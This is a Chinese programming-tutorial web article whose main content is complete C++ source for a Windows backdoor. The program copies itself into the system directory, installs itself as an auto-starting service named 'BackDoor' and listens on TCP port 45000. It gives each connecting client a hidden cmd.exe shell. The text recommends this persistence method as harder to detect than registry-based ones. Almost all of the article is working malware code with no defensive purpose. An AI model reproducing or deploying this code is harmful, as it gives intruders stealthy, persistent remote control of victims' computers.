C++语言程序设计之实现后门的服务自启动
王永明 2019-04-10 来源 : 阅读 184 评论 0

摘要:本文将带你了解C++语言程序设计之实现后门的服务自启动,希望本文对大家C++语言程序设计有所帮助。

本文将带你了解C++语言程序设计之实现后门的服务自启动,希望本文对大家C++语言程序设计有所帮助。


C++语言程序设计之实现后门的服务自启动




Windows NT系统后门要实现自启动,有许多种方法,例如注册表自启动,映像劫持技术,SVCHost自启动以及本章节介绍的服务自启动等方法,其中服务自启动相对于上述其他三种需要修改注册表的启动方式而言更不容易被发现。

C++代码样例


   

//////////////////////////////////////////////////////////////

//

// FileName : ServiceAutoRunDemo.cpp

// Creator : PeterZ1997

// Date : 2018-5-4 23:19

// Comment : Create Service to make the BackDoor Run Automatically

//

//////////////////////////////////////////////////////////////

 

#include <iostream>

#include <winsock2.h>

#include <winsock.h>

#include <windows.h>

#include <winsvc.h>

#include <cstdio>

#include <cstring>

#pragma comment(lib, "ws2_32.lib")

 

using namespace std;

 

#define SERVICE_OP_ERROR -1

#define SERVICE_ALREADY_RUN -2

 

const unsigned int MAX_COUNT = 255; /// String Max Length

const DWORD PORT = 45000;           /// Listen Port

const unsigned int LINK_COUNT = 30; /// Max Link Number

 

SERVICE_STATUS g_ServiceStatus;

SERVICE_STATUS_HANDLE g_hServiceStatus;

 

/**

 * @brief CallBack Function to Translate Service Control Code

 * @param dwCode Service Control Code

 */

void WINAPI ServiceControl(DWORD dwCode)

{

    switch (dwCode)

    {

        //服务暂停

    case SERVICE_CONTROL_PAUSE:

        g_ServiceStatus.dwCurrentState = SERVICE_PAUSED;

        break;

        //服务继续

    case SERVICE_CONTROL_CONTINUE:

        g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;

        break;

        //服务停止

    case SERVICE_CONTROL_STOP:

        g_ServiceStatus.dwCurrentState = SERVICE_STOPPED;

        g_ServiceStatus.dwWin32ExitCode = 0;

        g_ServiceStatus.dwCheckPoint = 0;

        g_ServiceStatus.dwWaitHint = 0;

        break;

    case SERVICE_CONTROL_INTERROGATE:

        break;

    default:

        break;

    }

    //设置服务状态

    if (SetServiceStatus(g_hServiceStatus, &g_ServiceStatus) == 0)

    {

        printf("Set Service Status Error\n");

    }

    return;

}

 

/**

 * @brief Start Remote Shell

 * @lpParam the Client Handle

 */

DWORD WINAPI StartShell(LPVOID lpParam)

{

    STARTUPINFO si;

    PROCESS_INFORMATION pi;

    CHAR cmdline[MAX_COUNT] = { 0 };

    GetStartupInfo(&si);

    si.cb = sizeof(STARTUPINFO);

    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)lpParam;

    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;

    si.wShowWindow = SW_HIDE;

    GetSystemDirectory(cmdline, sizeof(cmdline));

    strcat_s(cmdline, sizeof(cmdline), "\\cmd.exe");

    while (!CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NULL, NULL, NULL, &si, &pi))

    {

        Sleep(100);

    }

    WaitForSingleObject(pi.hProcess, INFINITE);

    CloseHandle(pi.hProcess);

    CloseHandle(pi.hThread);

    return 0;

}

 

/**

 * @brief Service Running Function

 * @lpParam NULL

 */

DWORD WINAPI RunService(LPVOID lpParam)

{

    CHAR wMessage[MAX_COUNT] = "<================= Welcome to Back Door >_< ==================>\n";

    SOCKET sClient[30];

    DWORD dwThreadId[30];

    HANDLE hThread[30];

    WSADATA wsd;

    if (WSAStartup(0x0202, &wsd))

    {

        printf("WSAStartup Process Error\n");

        return 0;

    }

    SOCKET sListen = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

    sockaddr_in sin;

    sin.sin_family = AF_INET;

    sin.sin_port = htons(PORT);

    sin.sin_addr.S_un.S_addr = INADDR_ANY;

    if (bind(sListen, (LPSOCKADDR)&sin, sizeof(sin))) return 0;

    if (listen(sListen, LINK_COUNT)) return 0;

    for (int i = 0; i < LINK_COUNT; i++)

    {

        sClient[i] = accept(sListen, NULL, NULL);

        hThread[i] = CreateThread(NULL, 0, StartShell, (LPVOID)sClient[i], 0, &dwThreadId[i]);

        send(sClient[i], wMessage, strlen(wMessage), 0);

    }

    WaitForMultipleObjects(LINK_COUNT, hThread, TRUE, INFINITE);

    return 0;

}

 

/**

 * @brief the Main Function of the Service

 */

void WINAPI ServiceMain(DWORD dwArgc, LPTSTR *lpArgv)

{

    HANDLE hThread;

    g_ServiceStatus.dwCheckPoint = 0;

    g_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_STOP;

    g_ServiceStatus.dwCurrentState = SERVICE_START_PENDING;

    g_ServiceStatus.dwServiceSpecificExitCode = 0;

    g_ServiceStatus.dwServiceType = SERVICE_WIN32;

    g_ServiceStatus.dwWaitHint = 0;

    g_ServiceStatus.dwWin32ExitCode = 0;

    g_hServiceStatus = RegisterServiceCtrlHandler("BackDoor", ServiceControl);

    if (!g_hServiceStatus)

    {

        printf("Register Service Error\n");

        return;

    }

    g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;

    g_ServiceStatus.dwCheckPoint = 0;

    g_ServiceStatus.dwWaitHint = 0;

    if (!SetServiceStatus(g_hServiceStatus, &g_ServiceStatus))

    {

        OutputDebugString("SetServiceStatus Error !\n");

        return;

    }

    hThread = CreateThread(NULL, 0, RunService, NULL, 0, NULL);

    if (!hThread)

    {

        printf("Create Thread Error\n");

    }

    return;

}

 

/**

 * @brief Install Service

 */

int APIENTRY InstallService()

{

    DWORD dwErrorCode;

    SC_HANDLE hscManager;

    SC_HANDLE hServiceHandle;

    SERVICE_STATUS ssServiceStatus;

    CHAR szSystemPath[MAX_COUNT] = "\0";

    CHAR szFileSelfPath[MAX_COUNT] = "\0";

    GetSystemDirectory(szSystemPath, sizeof(szSystemPath));

    GetModuleFileName(NULL, szFileSelfPath, sizeof(szFileSelfPath));

    strcat_s(szSystemPath, "\\sysWork.exe");

    CopyFile(szFileSelfPath, szSystemPath, true);

    hscManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);

    if (!hscManager)

    {

        printf("Can not Open the Service Manager\n");

        return SERVICE_OP_ERROR;

    }

    printf("Service Manager Opened Success\n");

    hServiceHandle = CreateService(hscManager, "BackDoor", "BackDoor", SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, szSystemPath, NULL, NULL, NULL, NULL, NULL);

    if (!hServiceHandle)

    {

        dwErrorCode = GetLastError();

        if (dwErrorCode == ERROR_SERVICE_EXISTS)

        {

            hServiceHandle = OpenService(hscManager, "BackDoor", SERVICE_ALL_ACCESS);

            if (!hServiceHandle)

            {

                printf("Can not Create/Open Service\n");

                CloseServiceHandle(hServiceHandle);

                return SERVICE_OP_ERROR;

            }

            else

            {

                printf("Service Opened Success\n");

            }

        }

    }

    else {

        printf("Service Create Success\n");

    }

    if (!StartService(hServiceHandle, 0, NULL))

    {

        dwErrorCode = GetLastError();

        if (dwErrorCode == ERROR_SERVICE_ALREADY_RUNNING)

        {

            printf("SERVEICE IS ALREADY RUNNING\n");

            CloseServiceHandle(hServiceHandle);

            CloseServiceHandle(hscManager);

            return SERVICE_ALREADY_RUN;

        }

        else

        {

            printf("SERVEICE START ERROR\n");

            CloseServiceHandle(hServiceHandle);

            CloseServiceHandle(hscManager);

            return SERVICE_OP_ERROR;

        }

    }

    while (QueryServiceStatus(hServiceHandle, &ssServiceStatus))

    {

        if (ssServiceStatus.dwCurrentState == SERVICE_START_PENDING)

        {

            Sleep(100);

            continue;

        }

        if (ssServiceStatus.dwCurrentState != SERVICE_RUNNING)

        {

            printf("Service Start Process ERROR\n");

            CloseServiceHandle(hServiceHandle);

            CloseServiceHandle(hscManager);

            return SERVICE_OP_ERROR;

        }

        else

        {

            break;

        }

    }

    if (!QueryServiceStatus(hServiceHandle, &ssServiceStatus))

    {

        printf("Service Status Get Error\n");

        CloseServiceHandle(hServiceHandle);

        CloseServiceHandle(hscManager);

        return SERVICE_OP_ERROR;

    }

    printf("Service Start Success\n");

    CloseServiceHandle(hServiceHandle);

    CloseServiceHandle(hscManager);

    return 0;

}

 

 

/**

 * @brief Remove Service

 */

int RemoveService()

{

    SC_HANDLE hscManager;

    SC_HANDLE hServiceHandle;

    SERVICE_STATUS ssServiceStatus;

    hscManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);

    if (!hscManager)

    {

        printf("Open Service Manager Error\n");

        return SERVICE_OP_ERROR;

    }

    printf("Open Service Manager Success\n");

    hServiceHandle = OpenService(hscManager, "BackDoor", SERVICE_ALL_ACCESS);

    if (!hServiceHandle)

    {

        printf("Open Service Error\n");

        return SERVICE_OP_ERROR;

    }

    printf("Open Service Success\n");

    if (QueryServiceStatus(hServiceHandle, &ssServiceStatus))

    {

        if (ssServiceStatus.dwCurrentState == SERVICE_RUNNING)

        {

            ControlService(hServiceHandle, SERVICE_STOP, &ssServiceStatus);

        }

    }

    else

    {

        printf("Service Status Get Error\n");

        CloseServiceHandle(hServiceHandle);

        CloseServiceHandle(hscManager);

        return SERVICE_OP_ERROR;

    }

    if (!DeleteService(hServiceHandle))

    {

        printf("Delete Service Error\n");

        CloseServiceHandle(hServiceHandle);

        CloseServiceHandle(hscManager);

        return SERVICE_OP_ERROR;

    }

    printf("Remove Service Success\n");

    CloseServiceHandle(hServiceHandle);

    CloseServiceHandle(hscManager);

    return 0;

}

 

/**

 * @brief main Function

 */

int main(int argc, char* argv[])

{

    SERVICE_TABLE_ENTRY svTable[] = {

        {(LPSTR)"BackDoor",ServiceMain},

        {NULL,NULL}

    };

    StartServiceCtrlDispatcher(svTable);

    if (argc == 2)

    {

        if (!stricmp(argv[1], "--install"))

        {

            if (InstallService()&SERVICE_OP_ERROR)

            {

                printf("[!]Service Operation Error\n");

            }

            else

            {

                printf("[*]Service Operation Success\n");

            }

        }

        else if (!stricmp(argv[1], "--remove"))

        {

            if (RemoveService()&SERVICE_OP_ERROR)

            {

                printf("[!]Service Operation Error\n");

            }

            else

            {

                printf("[*]Service Operation Success\n");

            }

        }

        else

        {

            printf("[Usage] => *.exe [--install]/[--remove]\n");

        }

    }

    else {

        printf("[Usage] => *.exe [--install]/[--remove]\n");

    }

    return 0;

}

</cstring></cstdio></wins</windows.h></winsock.h></winsock2.h></iostream>

   


本文由 @职坐标 发布于职坐标。未经许可,禁止转载。
喜欢 | 0 不喜欢 | 0
看完这篇文章有何感觉?已经有0人表态,0%的人喜欢 快给朋友分享吧~
评论(0)
后参与评论
本文作者 联系TA

培训老兵——老王

  • 10
    文章
  • 334
    人气
  • 0%
    受欢迎度

已有0人表明态度,0%喜欢该老师!

进入TA的空间
名师指导直通车
  • 资料索取
    资料索取
  • 答疑解惑
    答疑解惑
  • 技术交流
    技术交流
  • 职业测评
    职业测评
  • 面试技巧
    面试技巧
  • 高薪秘笈
    高薪秘笈
TA的其他文章 更多>>
C++语言程序设计之单例模式的几种实现方式解析
经验技巧 50% 的用户喜欢
C++语言程序设计之引用和拷贝构造函数、按值传递和返回、位拷贝与初始化等实例
经验技巧 0% 的用户喜欢
C++语言程序设计之字符串string、向量vector和数组实例介绍
经验技巧 0% 的用户喜欢
C++语言程序设计内联函数inline的使用解析
经验技巧 0% 的用户喜欢
C++语言程序设计之下环形队列的简单实现
经验技巧 0% 的用户喜欢
其他海同名师 更多>>
刘新华
刘新华 联系TA
实力型。激情饱满,对专业充满热情
吴翠红
吴翠红 联系TA
独创“教、学、练、测”循环教学模式
吕益平
吕益平 联系TA
熟悉企业软件开发的产品设计及开发
黄泽民
黄泽民 联系TA
擅长javase核心技术
程钢
程钢 联系TA
擅长大型企业商业网站开发和管理
经验技巧30天热搜词 更多>>

您输入的评论内容中包含违禁敏感词

我知道了

免费获取海同IT培训资料
验证码手机号,获得海同独家IT培训资料
获取验证码
提交

版权所有 职坐标-一站式IT培训就业服务领导者 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
 沪公网安备 31011502005948号    ICP许可  沪B2-20190160

站长统计